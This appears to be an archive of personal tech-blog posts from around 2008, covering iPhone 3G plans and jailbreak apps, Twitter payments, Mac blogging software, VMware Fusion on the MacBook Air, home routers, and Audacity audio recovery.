AT&T brings iPhone 3G customers the best coverage on the globe and the largest mobile-to-mobile calling community with unlimited calling to AT&T’s 71.4 million wireless customers. iPhone 3G customers can choose from four individual AT&T Nation plans, which bundle voice and unlimited data (e-mail and Web browsing).

• AT&T NationSM Unlimited: Includes unlimited Anytime Minutes for $129.99 a month.
• AT&T Nation 1350: Includes 1350 Anytime Minutes and unlimited Night & Weekend Minutes for $109.99 a month.
• AT&T Nation 900: Includes 900 Anytime Minutes and unlimited Night & Weekend Minutes for $89.99 a month.
• AT&T Nation 450: Includes 450 Anytime Minutes and 5,000 Night & Weekend Minutes for $69.99 a month.

All AT&T Nation and AT&T FamilyTalk® plans for iPhone 3G include nationwide long distance and roaming, Visual Voicemail, Rollover®, unlimited Mobile to Mobile calling, Call Forwarding, Call Waiting, Three-Way Calling and Caller ID.

AT&T will offer FamilyTalk plans, with bundled voice and unlimited data, starting as low as $129.99 a month for two iPhone 3G lines. Up to three additional iPhone lines can be added for $39.99 each.
Unlimited text messaging can be added for an additional $20 ($30 for FamilyTalk plans of up to five lines); $15 (1,500 messages), or $5 (200 messages).

iPhone for Business

Business customers interested in iPhone 3G should contact an AT&T business sales representative or review their account information online to determine their eligibility for upgrade pricing. Corporate e-mail and other business applications require the Enterprise Data Plan for iPhone, which is $45 a month and bundled with an eligible voice plan. Small business customers may qualify for AT&T BusinessTalk, the industry’s only shared plan specifically for small businesses. Additional details on iPhone business offerings are available at www.att.com/iphoneforbusiness.

iPhone 2.0 Software

All iPhone customers will benefit from the iPhone 2.0 software, which will be pre-loaded on all iPhone 3Gs and available as a free download for current iPhone customers. The new software will include numerous enhancements, such as business-class e-mail access via Microsoft Exchange ActiveSync; the iPhone Software Development Kit (SDK), which allows a business to easily create applications customized to its needs; and the App Store, which offers a wide-range of applications — from games to business, education to entertainment and productivity to social networking. For example, AT&T has developed YELLOWPAGES.COM Mobile for iPhone, which takes local mobile search to a new level by allowing users to discover businesses and local events based on their popularity among other iPhone users, get directions and access business reviews.

So - The real question is this: Who plans to get in line early? :)

Nate Westheimer of The Silicon Alley Insider has this to say:

Twitter should take full advantage of their messaging platform, user base and user disposition to lead in the P2P mobile payments space, where, despite years of hype, no one has much of a head start.

Link to the article: How Twitter Could Be Worth A Billion In A Year

I have to admit, coming from the Internet financial services space, the thought of this actually happening scares me slightly, given the serious lack of stability and the manner in which changes have been made at Twitter with less than complete communication. But at any rate, they have a lot of money to throw at the problems, so I am rooting for them to get things right. It just hurts. :)

Westheimer makes some good points. Twitter is carrier/provider-agnostic and has amazingly terrific user and market penetration. Just as I send you a direct message today by typing "d yourname hi how are you?" I could pay you using syntax like "p yourname $20."

But getting from here to there is an whole other story. It's far from trivial to create a financial transaction and accounting system, especially one that scales to the sizes required (but it certainly can be done).

It's an appealing and interesting idea and one that warrant some real thought. As someone who comes from the the online banking software, infrastructure and security world, I can see the market need as well as the challenges from many fronts that will face any company that finally jumps fully on-board the micro-payments and mobile-payments train. A number of good, well-funded companies have given it a run before with limited success. It's a complex problem to solve, but it's doable.

It sure sounds like a fun challenge, and there's a massive marketplace out there just waiting for someone to get it right. Note the operative verbiage there - Doing it well is critical to success. The fact is there's no room for "scale later" in this game.

What do you think? Would you pay people via Twitter if you could? Would it be useful to you?

I've really missed Windows Live Writer since I starting using my Macbook Air so much. Even though I have it in a Fusion virtual machine running Windows, I find I rarely use it since it uses the VM's filesystem (not the Mac's), and copying stuff onto the Mac clipoard and then pasting into a Windows virtualized app is not what one might wish.

I was pleasantly surprised to run across a Mac app called Blogo, which I am using to write this post. It's nowhere near as feature-rich as Live Writer, but Blogo is a great start on a WYSIWYG editor with many of the bells and whistles. I pointed it at my blog home page during setup, with very little hope it would auto-discover my blog settings, but I was pleasantly surprised. Up popped a dialog asking for my username ad password, and once I provided it, there on the screen was my list of blog posts pulled straight from the server's API (which I seem to recall emulates the Blogger API). Very nice.

Blogo has a funny icon logo, is available as a free 21-day trial, and after that it's $25. There are a few key features missing that might make me pause when it comes to shelling out the cash. Specifically there is no spell checking (I'd like to see red underlines and inline corrections with the right-click action), selecting text and trying to drag it around doesn't work, the image editor is fairly limited, and it doesn't seem to pull my list of existing categories. Plus you cannot edit the HTML it creates (yet) and pasting multimedia content inline doesn't seem to work well. But as I said, it's a great start. If you have a Mac and you're frustrated with other blogging apps, you should check it out.

It's the best WYSIWG mac client I've found so far, so it earns a spot on my Mac's Dock. I will be keeping up with this editor's progress with high hopes, and am encouraged there may yet me a Mac blogging client to rival WLW.

We can hope!

A mashup of true and mostly-true stories from IT hell. If you've ever called tech support and wondered what the hell they are doing down there... well, this should answer some questions for you. Starring Apache, Windows XP, Linux and Halo (among many others).

You can use the Kit to help protect your network infrastructure by configuring a Forefront Client Security compliance health policy across your network, monitoring the operational health of Forefront Client Security in real time, and remediating problems that arise.

Gmail engineers come up with new ideas all the time. Gmail Labs is our place to try them out and get your feedback. None of these features are really ready for prime time yet, so they might change, break, or disappear at any time.

At 6pm PT they’re launching Gmail Labs – it will be a tab on top of settings, a list of features that are rough, have gone through almost no filtering. Using the send feedback link users can go to the Google Conversation. Every user will have this available.

The first batch will include 13 new features being tested now, all created by Gmail engineers. Everyone will have access to these.

Since mid-March, Apple Inc. and its logistics partners have imported 188 ocean containers of a product type never before declared on its shipping manifests.

With iPhones currently out of stock at many Apple stores, including its flagship outlets in New York City, rumors abound that the company is winnowing stocks in preparation for a new 3G version of the phone.

• Fortune Apple 2.0 - What to expect from Steve Jobs on June 9th
• Reuters - AT&T CFO: No pricing yet for next iPhone (but he expects it in the next few months, he says) 
• AppleInsider - Latest iPhone 2.0 beta adds geo-tagging to Camera photos
• ChannelNews Australia - OZ 3G iPhone to be fastest in the world (like as in 42mbs - wow!)
• Also, at&t's high-speed 3G network roll-out should be complete in June - Good timing
  

http://www.intelliborn.com/repo/Intelli.plist

• View Calendar, Email, Text Messages, News, Sports, and Weather from your iPhone "Slide To Unlock" screen
• Smooth scrolling across each item to quickly glimpse at your data
• Auto-Checks Email when you view the unlock screen - no need to "Refresh" from Mail.app or wait 15 minutes
• Go directly to the application of your choice with a "Swipe"
• Precise International Weather (by Zip) provided by Weather Underground.com
• News Feeds include Yahoo!, CNN, Fox News, and Reuters (more coming soon!)
• ESPN Sports Feeds include MLB, NFL, NBA, NHL, NCAA Men's Football and NCAA Women's Basketball
• Customizing your IntelliScreen is easy! Choose which content you want to view and where
• Mail and Text Messages can be shown only if new items are available

I'm pulling my hair out (what I have left, anyhow) trying to find a good home/home office wireless router that includes all the features I need. Granted, I'm a bit of a power user, but I'm honestly a bit surprised I can't find what I want out there somewhere. You'd think someone would build it. My list of features and performance requirements includes:

• Gigabit WAN and LAN ports - and needs to have four LAN ports
• VPN capability that I can use cross-platform - an SSL VPN might be the best option, but whatever works well and lets me connect with Windows, Mac, etc. is what really matters to me
• Working, reliable and effective QOS - routers I have used in the past have either been terrible or mediocre at properly shaping and allocating traffic for VoIP and other services
• Reliable and full-featured administrative capabilities in firmware
• Quiet, reliable hardware
• IPv6 support
• Wireless-N

Until recently, I have been using a D-Link DIR-625 router, which has been stable and reliable. But it's a 100-megabit device and the QOS is marginal for VoIP traffic in my experience. Plus the firmware has not been updated recently and there is no VPN capability. It's rock-solid at what it does, though. I've only had to reset it a couple times since I have had it.

I've looked at the D-Link DIR-655 router, which is their currently-touted gigabit version of the 625 model. It's still on my list possible solutions, but with no VPN it doesn't meet all my needs, and D-Link doesn't seem to have one that includes all the features.

Yesterday I picked up a VPN router with gigabit and QOS made by Linksys, the WRVS4400N. It's not cheap and honestly I'm not sure why I allowed myself to buy a Linksys product after all the headaches I have had with them before. The net result of the past 12 hours of use is that I'm going to return it today. Between the slow reboots required with every other change I make and the lack of capabilities in the software (and some stuff that just doesn't work), it's already frustrating me. D-Link has seriously spoiled me in the Admin interface/firmware capabilities department, even without releasing any updates. Add to that the high-pitched whine the Linksys router makes and the heat it generates when plugged in and there's just no way. The whine is pretty awful, and gives me a serious headache within minutes if I am near it. Back to the store it goes.

So, I am left without a solution that meets all my needs. I may just have to pick up the D-Link DIR-655 and live without VPN and then find a separate VPN solution, but I don't want to if I don't have to. Any ideas anyone? Is there an option out there that will meet my needs and expectations?

VMware Fusion 1.1.2 addresses two MacBook Air-related problems. Previously, MacBook Air users would encounter a crash if a virtual CD/DVD drive was connected to the virtual machine but a CD/DVD drive was not connected to the MacBook Air. This update fixes this issue.  Also, this latest VMware Fusion update adds the ability to burn CD/DVDs with the MacBook Air’s USB Superdrive.

• IPv6 information on Wikipedia
• IPv6 info from Microsoft
• Sean Siler's IPv6 blog

One of the main reasons I decided I would buy the MacBook Air recently was that I knew I would be able to run Windows on it, either in a bootable install or in a virtual machine. In fact there is really one main app that I use all the time on Windows that I just can't get for the Mac, but that's a topic for another post. I'm quite happy with the Air - It's a great machine and  I have to admit that OS X has grown on me.

I bought a copy of VMWare Fusion after doing my required research. Compatibility with OSes and a variety of different features/capabilities put it at the top of my list for a virtualization host. I have a couple copies of Windows Server 2003 lying around here that I never broke the shrink wrap on, so I built a trimmed down virtual machine for use on the Mac.

In fact, I built three of them. But every time I installed a new VM and got it up and running, every time I restarted the machine VMWare would simply quit, die, crash - console and all. No running process and nothing on the screen.

Long story short, I searched and searched and searched and then went to the VMWare user forums, where I found a note about issues people have been having with Fusion and the MacBook Air when using the Air's external DVD drive. Apparently because I was unplugging the DVD drive and then restarting the machine without it attached, Fusion was somehow wigging out (my term) and closing unexpectedly.

After reconfiguring the VM in Fusion's control panel to no longer show the missing drive as "connected," the VM fires right up and works. Hopefully this is something VMWare will address in it's next Fusion update. It's tough keeping up with the nuances of new hardware, to be sure, so looking forward to a fix. In the meanwhile, manually removing the DVD drive in the VM's settings works like a charm.

Richard Campbell and I sat down and discussed virtualization with Anil Desai. Released in beta with Windows Server 2008 and soon to be released in it's final form, Hyper-V is an interesting and worthwhile technology that leverages 64-bit computing and allows you to run different virtual OS'es on the server with full symmetrical multiprocessor support. Virtualization is a primary role of Windows Server 2008. The release candidate of Hyper-V is available now.

You can download and listen the MP3 version of our interview with Anil by clicking here, or click over to the RunAs Radio site for more formats (like WMA, AAC), which is where our weekly IT audio talk show "lives."

For more information from Microsoft about Hyper-V, check these links:

• Hyper-V FAQ
• Hyper-V RC Key Features
• How to Install Hyper-V

I downloaded a new iPhone native app this morning called Twinkle, which is a terrific Twitter client with integration to the iPhone's camera and the radio geolocation abilities. Even without those two enhancements, Twinkle would be - by a long shot - the best option for the iPhone when it comes to Twitter. To get Twinkle, you need to install it via the Installer.app program for jail-broken iPhones (see below for some more info).

Twinkle automatically figures out (approximately) where you are using Erica Sadun's FindMe utility, and uses that to label your Twitter posts with your location - very cool. It also allows you to cclick on a "near me" button to find posts from people located - you guessed it - near you. You can fine tune the distance and it's a nifty addition to Twitter.

A few observations:

• Twinkle is a very fast app - which is welcome since web-based options tend to be very slow, to the point of painful. This app, however, races.
• The UI design and usability to pretty darned terrific. It's quite well though-through.
• I wish I could follow people from within Twinkle. That's one feature that's missing. I hear it's coming soon though.
• Looks like I cannot click on URLs in tweets - that's certainly a missing feature (also coming soon).
• Need links to pics that are posted in the tweet - Can't see a reference to the image in the web Twitter interface if I include a pic.
• The app has has crashed on me a number of times while it's trying to do the geolocation, not sure if my fringe-area location has anything to do with that or not.

Of course, the app creator has a Twitter account, and you can see how popular it's becoming when you look at tweets that refer to Twinkle on TweetScan.

A few iPhone screen-grabs to show it off (click each one to view full-size):

View of my followed peeps' tweets

You wouldn't normally see this too often. My
fringe coverage area means I'm hard-to-locate.

 
Viewing an individual tweet, with ability to
reply, direct message, or go to the tweeter's
individual profile/post page.

 
Replying to myself. Yeah, that's a little weird.

What you see when you view an individual
profile. Nice.

Ah screen-door effect. Taking a picture
to attach to a tweet.

Note the paperclip showing a picture is
attached. Also, the character count actually
works and is accurate, which is a weakness
of many twitter clients.

 
Clicking on the paperclip allows you to
view the attached image - a nice friendly
addition. You can also remove the image
from here, if you change your mind or
want to shoot a new one.

Note: In order to use Twinkle today, you have to "jailbreak" your iPhone, a modification that allows third-party applications to be installed on the device. In the future, you will hopefully be able to download Twinkle from the Apple app catalog (once it's made available). But not today. An obligatory word of warning... If you do the jailbreak process, Apple won't provide support on your phone in the event you need it (unless you restore the phone to non-jailbroken status of course). The ZiPhone jailbreak app is slick and simple - you can just download for Windows or Mac, plug in your iPhone, click a few times, wait a few seconds and you're done. Google it if you want, you'll find it.

On April 12th, we'll be participating in the first Webfoot event in Portland. Webfoot is a web-focused event for all creatures, techie and non-techie alike. Bring the whole family for a day of education, entertainment, and fun!

Technical topics include Silverlight 2, Internet Explorer 8, and hopefully some sessions from the Firefox and Adobe gang if we can get them to show up. :)

Non-technical topics for the normal people include safe Internet browsing.

We'll have food and even some activities set up for the kids, such as Lego Mindstorms.

When: Saturday, April 12th
1:00pm to 7:00pm (dinner provided)

Location: OGI School of Science and Engineering
Wilson Clark Center for Lifelong Learning
20000 NW Walker Rd
Beaverton, OR 97006

Add to Mossberg's comment the recent orders of 3G chipsets and related ramp-down of 2G production at the company Apple sources their equipment from, plus side comments by other industry execs and some good Apple-style business common sense thinking, and it all really does start to add up.

Looks like it's time to start tossing that loose change in the ol' jar again each day.

"Cern, based near Geneva, started the grid computing project seven years ago when researchers realised the LHC would generate annual data equivalent to 56m CDs - enough to make a stack 40 miles high.

"This meant that scientists at Cern - where Sir Tim Berners-Lee invented the web in 1989 - would no longer be able to use his creation for fear of causing a global collapse.

"This is because the internet has evolved by linking together a hotchpotch of cables and routing equipment, much of which was originally designed for telephone calls and therefore lacks the capacity for high-speed data transmission.

"By contrast, the grid has been built with dedicated fibre optic cables and modern routing centres, meaning there are no outdated components to slow the deluge of data. The 55,000 servers already installed are expected to rise to 200,000 within the next two years."

# hostinfo

Mach kernel version:

         Darwin Kernel Version 9.0.0d1: Wed Oct 10 00:07:50 PDT 2007; 

root:xnu-933.0.0.204.obj~7/RELEASE_ARM_S5L8900XRB

Kernel configured for a single processor only.

1 processor is physically available.

1 processor is logically available.

Processor type: armv6 (arm v6)

Processor active: 0

Primary memory available: 116.00 megabytes

Default processor set: 26 tasks, 164 threads, 1 processors

Load average: 0.00, Mach factor: 0.98

# export MONO_DISABLE_SHM=1

# ./mono hello.exe

Hello Mono World

#    

• Keyboard - Backlit, brightness auto-adjusts, nice keys, quiet typing.
• Screen - Excellent backlight, also auto-adjusts, bright and contrasty.
• Thin - Well, duh. And light, too. That was what got me to look in the first place.
  
• Battery - Not going to get the advertised 5 hours, but I have pounded it pretty hard for about 2.5 and its still advertising an hour left on the battery (first charge)
• Close-lid-sleep-wake-up drill - Nice and quick. I like that.
  

Got iTunes, or anything else Apple on your Windows computer? If so, when the Apple software checks for updates, you'll probably see an option (which is enabled by default) to install Safari - even if you don't already have it installed  on your computer. Safari is Apple's default web browser (and actually not a bad one at that). But since people are used to seeing - well - updates when the software checks for updates, you might not realize you're installing new software.

Just making sure you're paying attention here, is all.

Sure enough, when I check for updates on my Windows machine, where Safari has never been installed, I'm presented with the option to install it...

As Tom Krazit tells us... Just un-check the box if you don't want to install Safari. Simple as that.

"It seems that at some point people became conditioned to downloading anything that shows up from an official source, like Microsoft, Apple, AOL, Yahoo, or whoever. Remember, it's your PC; spend your installation capital wisely." (link)

It's always important to pay attention to what you're clicking on. Fact is, Apple's probably counting on the fact that a significant number of people will just click without thinking - And that's indicative of a whole slew of problems, with users, companies, you name it.

For my part, I made the educated decision to install it. I actually kind of like Safari on the Mac, so I'm interested din trying it on Windows.

We recently conducted an interview with Michael Manos, Senior Director of Data Center Services at Microsoft, on RunAs Radio. Microsoft's been working on a substantial set of data center build-outs, and so Richard and I figured there's a lot we can all learn from someone like Michael. Not many people have to think as carefully or in such a large scale about how to best tackle the data center design and build issues.

Microsoft has been doubling their data center capacity each year, and they have to think about maximizing efficiencies, "greening" the data center, locations, power - you name it.

If you're in any way associated with data center design, architecture or operations this show's for you.

Stories at CNN, Ars Technica and CNET are covering the fact that Apple is working on a plan that would allow unlimited "free" access to the iTunes music library - if users paid more up-front for their iPod devices.

This sounds interesting, but it seems like an up-front charge (when you buy the device, as a one-time fee) might have some legal (not to mention business viability) challenges associated with it. Now, if they were to go with a Zune-like monthly subscription model, that would be a whole different story. It would actually make a lot of sense.

Group-think/conventional wisdom seems to be that since the average iPod/Phone user spends about $20 total on music through the iTunes store, it would make sense to charge everyone that much up front. Others say something more like $80 is more reasonable. I think they're all wrong: Charge me $20 up front, and I will do everything I can to maximize - in a big way - that mandatory investment. People only spend an average of $20 because they have to keep paying. Charge that up front and grant them unlimited access, and they'll download more music than you can possibly imagine.

That's where the Zune Pass idea is a better one. Recurring monthly revenue of a predictable, fixed amount (which is great from a business standpoint) and a happy customer base. I just don't see a one-time fixed fee model holding water for very long. But then again, if your intent (hypothetically) is to launch a firestorm campaign to (further) monopolize the market and then dump it as unviable... Well, you might actually succeed at one goal by failing at another. Just an thought. :)

Guy Kawasaki and a couple of his friends recently fired up a site/service called Alltop, which displays a variety of popular topical areas in which various popular blog/news feeds are aggregated. Think of each of the topical sites as a one-stop-information-shop. High-level topics include the categories of Work, Living, People, Interests, Culture, Geekery, Good and News. On his blog Guy describes it as:

Alltop... a news aggregation site that provides “all the top” stories for forty of the most popular topics on the Web. The headlines and first paragraph of the five most recent stories from forty to eighty sources for each topic are displayed. Alltop stories are refreshed approximately every ten minutes.

The interface is clean and easy to read - lots of information on the page. Mouse over a headline and see the first few sentences of the article. Click the headline to go to the original site and read the full article or post.

I'm privileged to be among the bloggers whose sites are listed on the Windows Alltop news site (at http://windows.alltop.com/), along with a list of information sites and authors which - truth be told - I am amazed to be paired with. I mean, glancing at the site right now, I'm on the page between Ed Bott and the IEBlog. If I work hard enough at it, I can only hope to provide the types and quality of information you get from the other sites in the list.

Check out Alltop. Lots of good stuff there.

Vista SP1 is available (details in the document available at this link and Ed Bott did a great what-to-expect write-up and FAQ), so it's time to head on over to Windows Update (it's in your start menu) and grab it. Assuming it shows up in the available-updates list, of course. Apparently there are certain drivers and configurations which, if present on your system, will prevent the service pack from being offered. A Microsoft Knowledge Base article - KB948343 - details the possible causes and solutions.

I upgraded on my 64-bit Vista Ultimate machine a little less than a month ago and have been happy with the performance improvements. If nothing else, just the speed of file copies over the network made it completely worthwhile. Add in other improvements and fixes and it's an important one in my book.

Yesterday I mentioned some new C# screencasts by my friend Stuart that are being published over at Channel 9. Another screencast-format resource for learning about .NET programming and the .NET framework is a new site that Dmitry Lyalin put together recently, called "Better Know a Framework." Dmitry recently joined Microsoft on the East Coast and is passionate about helping people understand the technology. So, if you're a .NET programmer (or want to be), you should check it out, as well. The screencasts so far are well-produced and quite usable.

A short introduction...

The Concept. The concept behind Better Know a Framework is directly inspired by a segment on the .NET Rocks podcast. In this segment the host (Carl) regularly discusses a class or a part of the .NET Framework as a way to expand peoples knowledge. My inspiration is to take this to the next level and bring screencast content to the development community in a similar fashion, a small segment at a time.

One of my colleagues and past co-worker when I was at Corillian/CheckFree, Stuart Celarier, has teamed up with Microsoft's Bruce Kyle and made a whole slew of what they're calling "Whirlwinds" that are being published at the Channel 9 community site at MSDN. By the time they've all been published, Stuart tells me he will have visually covered every new feature in C# v2. Wow, cool information! Stuart, correct me here if I am somehow exaggerating. :)

You can start anywhere you like as these screencasts are published, but for reference, here's a link to the first one, and some information about the project:

Bruce Kyle of Microsoft and Stuart Celarier of CheckFree explore the new languages features in C#. It's a whirlwind tour of the important language features since C# 1. Stuart describes the feature and why it is useful. But doesn't get into best practices nor suggested usages. Just the facts about the feature.

Whirlwinds are bite-sized webcasts, each is shorter than 15 minutes. You can start anywhere in the series to learn about the parts you're most interested in.

In Part 1 about generics, Stuart describes:

• What generics are.
• How generics compare with collections.
• How the compiler treats generics.
• He also describes how generics increase performance and save memory.

This feature is part of C# 2 in .NET 2.0.

Also available is "Whirlwind 2: What's new in C# 2 - Iterators," with lots more to come. Cool idea, well-executed - Congrats, Stuart! If you're a C# person (or would like to be), be sure to check it out.

When I record my audio for the RunAs Radio show, I'm typically sitting in my home office at my desk and using Audacity along with my Samson 01U USB microphone plugged into my Vista laptop. Audacity is an open-source program for all sorts of fancy audio recording, processing and editing. It's really pretty amazing.

Until fairly recently, Audacity was also pretty reliable. But about a month ago I started experiencing occasional crashes when trying to save and export the audio from my recording sessions. Now, if you think about for more than a couple seconds you'll quickly understand that crashes that occur after the interview is over, but before the file is saved, are extremely frustrating - and not just for me. A recording session do-over with three or more people involved in a 30- to 45-minute interview is really not a nice thing to have to ask for.

This morning Richard and I completed an interview with a guest. When I went to save the file, Audacity crashed. My heart sank, and my brain went into oh-crap-overdrive mode. I really did not want to be in the position of having to ask a busy guest to schedule more time to record an interview that had been quite good in the original session. I needed some magic.

I started thinking about temp files. The hard drive is always flashing away as I record the interviews, so something must be saved somewhere, right?

Sure enough, a quick search for *.au files on the hard drive uncovered nearly 400 files in a "_data" folder off the Audacity project's location. The date and time stamps on them made me feel a lot better - Phew! Each file appeared to contain 10 seconds of audio. The first one was stamped with the exact time we started recording the interview, and the last one with the time we stopped.

I imported all the .au files into Audacity, thinking I could just do that and I'd be good to go. But it turns out Audacity doesn't import files one-after-the-other on the timeline. Instead, it imports them as if they were almost 400 individual tracks in a single 10-second audio project. I started the click-cut-end-paste process, and quickly realized it was going to take literally hours to fix this problem manually.

(Also, just for fun I decided to see if the program would actually play a 10-second project session with 400 tracks in it. No dice.)

I quickly gave up on the cut-paste option in search of something better. What I found was the aptly-named Audacity Recovery Utility. Apparently I'm not the only one who's needed to recover recorded audio seemingly lost during application crashes. It's a Python app and can be used on Windows, Mac and Linux.

The program is simple in its execution. You point it at a folder and it looks for audio files, tries to determine if they are all one block/set, or if they're more than one, and then attempts to put them together into a single .WAV file that you can then import back into Audacity (or anywhere else for that matter) for editing and processing.

The app will confirm what it finds and give you a chance to stop it from proceeding.

Tell it "Yes" and the program starts processing the temp files.

Out the other end, you'll eventually get a .WAV file that you can use.

Sure saved my backside today. Thanks to the author! By the way, supposedly Audacity 1.3.2 and newer (which is a beta release right now, not the stable version) have crash recovery built in. I'll probably have to check that out, as well.

The Firefox team has released Firefox 3 Beta 4, which you probably have already read about and downloaded if you're a hard-core geek. But you can say you heard it here again. :)

It's definitely a test version, so expect bugs and other weirdness, as they say:

Thank you for helping test Firefox 3 Beta 4! This release is being made available for testing purposes only. You should read the release notes before getting started.

We want to hear all of your thoughts about this beta, especially if you encounter broken sites or other web weirdness. Drag this feedback button onto your bookmarks toolbar and click on it when you have something to tell us. We'll be waiting to hear from you! (Or, if you'd prefer, you can file a bug.)

I downloaded it as a Portable App from this link.

When the Windows Home Server data corruption bug surfaced a couple months ago (updated information is available here), the Home Server team at Microsoft focused their efforts on squashing it. As a result, the Home Server Power Pack 1 release was delayed as a lower priority (and understandably so at the time).

Microsoft has recently announced that they plan to get the data corruption issue fix out to the market in June this year, but Home Server Product Manager Todd Headrick posted a query on the Microsoft Home Server forums asking people if they'd like to get Power Pack 1 sooner, or if we'd prefer to wait for the corruption fix and take it all at once.

I've voted for the "Power Pack now" option, and will be glad to take a data corruption fix later. As long as there's no dependencies on the bug fix (and it sounds like there's not), and as long as additional risk is not being generated, releasing the power pack earlier is certainly the best option, as long as it's ready. Here are a few reasons why:

• 64-bit client support, so users of Vista 64-bit can use the home server as it is meant to be used (this appears to be a broader-reaching and more-common issue than many thought it would)
• Ability to back up the home server folders to external drives
• Usability and UI improvements
• Other fixes
• Opportunity some good news into the channel (it's a great product with a lot of goodwill in the community that would benefit from some positive karma right now)

As a general rule, big companies (or "enterprise" customers, as we call them) want multiple changes carefully packaged together, with as many problems solved in one patch or update as possible, with low risk. But Home Server is notably not an enterprise product. Instead it is laser focused on a crowd where more frequent feature and fix releases are preferred, encouraged and asked for. So, in the case of Home Server it's probably best to adopt something closer to an iterative release cycle.

What do you think? Microsoft wants to know!

Ahhh, a big thank-you to Google. I can now sync both directions between Outlook 2007 and my Google Calendar account thanks to Google Calendar Sync. Simply install one little program that occupies (another) space in the taskbar, and set it to sync as often as you wish. Simple as that. I like simple.

I just installed the app, specified my Google Apps account (yep, it work with the Apps calendars, too) and everything was perfect. Can't ask for more than that.

You can set the direction of information flow (from Google Calendar to Outlook, from Outlook to Google Calendar, or both directions), as well.

Quick, useful, easy and it "just works." This whole mobility concept is starting to become more and more usable and seamless. Nice.

UPDATE: In the comments and in email, a couple smart people have asked some important questions regarding whether the app syncs everything it needs to. My thoughts: "So, there's certainly room for improvement, and it looks like some relatively simple enhancements with corresponding configuration options would make this an even better app for a broader range of users."

Microsoft and Apple have announced that they are working together to  make Exchange Server and the iPhone mobile phone work well together. Apple will license Exchange ActiveSync for use on the iPhone, which will in Turn help assure the Exchange Server dominance in the marketplace stays they way it is. It's really as simple as that.

The fact is that Exchange is a pretty terrific server product for email, calendaring and a lot more. The iPhone is a pretty terrific mobile device. They don't integrate too terribly well today: You can sync your calendar and contacts via the USB connection to your computer, and you can get IMAP email from a properly-configured Exchange server (which works, but is not exactly optimal). But it's far from simple, far from seamless, and far from supportable in the enterprise.

One has to wonder what this means, either directly or indirectly, for the Windows Mobile world. I know the arguments: Different markets, different platforms, different purposes, etc. etc. etc... but with the iPhone SDK availability, that gap will be much narrower. And the fact of the matter is, Apple has the usability nailed with the iPhone. Sure, there's a few enhancements needed. But those are ones that can (and I'm certain will) be done.

ActiveSync will provide the ability (assuming Apple leverages all the features) to do push email, calendar and contact sync over the air, and task list sync.

Perhaps one of the more important potential benefits from ActiveSync integration with the iPhone is the ability to get enterprise-class security on the device, which to date is lacking and doesn't meet the needs or standards of most commercial IT departments. Exchange 2007 clients can be set up for enforced enterprise IT "policies" or controls, which would go a long way toward satisfying the security needs. In my mind, that's the biggest potential win. Without that, pushing email and syncing calendars and contacts is to risky an activity.

From Apple's press release come details of what they intend to provide - and it looks liek Cisco VPNs are in the package, as well:

Apple has licensed Exchange ActiveSync from Microsoft and is building it right into the iPhone, so that iPhone will connect out-of-the-box to Microsoft Exchange Servers 2003 and 2007 for secure over-the-air push email, contacts, calendars and global address lists. Built-in Exchange ActiveSync support also enables security features such as remote wipe, password policies and auto-discovery. The iPhone 2.0 software supports Cisco IPsec VPN to ensure the highest level of IP-based encryption available for transmission of sensitive corporate data, as well as the ability to authenticate using digital certificates or password-based, multi-factor authentication. The addition of WPA2 Enterprise with 802.1x authentication enables enterprise customers to deploy iPhone and iPod touch with the latest standards for protection of Wi-Fi networks.

The iPhone 2.0 software provides a configuration utility that allows IT administrators to easily and quickly set up many iPhones, including password policies, VPN setting, installing certificates, email server settings and more. Once the configuration is defined it can be easily and securely delivered via web link or email to the user. To install, all the user has to do is authenticate with a user ID or password, download the configuration and tap install. Once installed, the user will have access to all their corporate IT services.

Good move Apple. Good move Microsoft. Looking forward to this one!

After seven years with Dish Network, I made the change Monday to DirecTV and their HD programming. Granted, Dish Network's HD package has improved lately, and their new HD-only package was interesting, but a few things swayed me away and over to the other satellite programming vendor.

DirecTV has great HD capacity today and is quickly adding more. Another satellite will be launched in the next couple weeks, in fact. Their HD quality is pretty darned good. I like their equipment. And, although it's not here yet, I am thinking ahead to the forthcoming HDPC-20 - a DirecTV tuner device that will integrate with Vista Media Center. I'll be an early adopter of that technology, you can be sure.

The installer was great (despite the pouring rain he had to deal with), and before I knew it I was enjoying 90+ channels of HD programming. I can see some compression in some of the HD content, but you have to expect some of that. All I know is it looks much better than cable TV HD service I've seen before. I suppose I could complain about the fact that I now have a bigger antenna on my roof, but that seriously doesn't matter. I'm getting a lot of choice in return.

Bonus features include the ability to add my own external 750GB eSATA drive to the HD DVR (nice!), web-based DVR remote scheduling, Internet connectivity for on-demand content and information (which is new and in beta), and nice menus and software on the receivers in general. Seriously, it just feels better when you use it.

I'll be participating in the "cutting edge" program, loading software releases for the HD receiver and HD DVR devices at odd hours now and then to test new features and fixes before they're released nationwide. So, this move helps me fulfill the needs of my inner geek, too.

It's really a world of difference with the new service. Quality- and content-wise, it's a big step up.

Mine iPhone's jail-broken to let me use a couple truly-useful apps written by third parties, so I'll just wait a few hours before I apply this update from Apple, but early reports are that this new version of the iPhone/Touch firmware can be jail-broken using ZIPHONE (for the adventurous only of course), but note that the author (Zibri) says not to upgrade yet, and to wait for him to create a quick update. No problem. I like having my NetFlix queue available, so jail-breaking is in the cards for me.

The Unofficial Apple Weblog has all the goods and is updating with more info as they discover the details of this firmware release. So far bug fixes seems to be the official word.

Nice that Apple's supplying regular fixes. I'm not exactly counting on being pleasantly surprised and finding things like 802.1x and a whole slew of other needed enhancements, though. Hopefully some day.

It's a little strange, I suppose, even though I have this fancy home theater projector and sound set up in a room allocated just for that purpose, that my living room TV would a 12-or-so-year-old RCA rear projection set. The old RCA is a reliable, still-going strong, 53" wood cabinet model. But it has a glossy screen and reflects light like a mirror. It's hard to watch anything when it's light outside, for sure. the place where the TV lives provides the perfect angle for reflecting the view out the french doors.

This weekend, Fry's electronics has a great sale on a 42" LG 1080P LCD HDTV (model 42LB5D) on sale for $997.00 (also available online for that price as of the time of this writing, with very reasonable shipping), which is a steal no matter how you look at it. Best Buy's price is around $1599, and you can find it online for around $1200 if you look hard enough. But the Fry's advertised price this weekend was something else entirely.

After a day of thinking about it, I decided it was a good enough deal to take advantage of, and that it would be nice to reclaim some space in my living room. At Best Buy they were willing to match the Fry's price for me last night (frankly, I'd prefer to purchase at Best Buy, but I was open to the alternative if they could not match), and so I drove into town and picked up my new living room TV for $600 less than the floor price and took it home. Score!

It was 11pm by the time we got back home and I was tired, but that's never really stopped me. We set it up and turned it on. In short, as I expected, it's an amazing difference. The LG set is very, very bright and has a great picture, and with 3 HDMI inputs and a variety of others, I'm set. We hooked up a HDMI up-converting DVD player and watched American Psycho (wow, what a film, heh). Color me impressed.

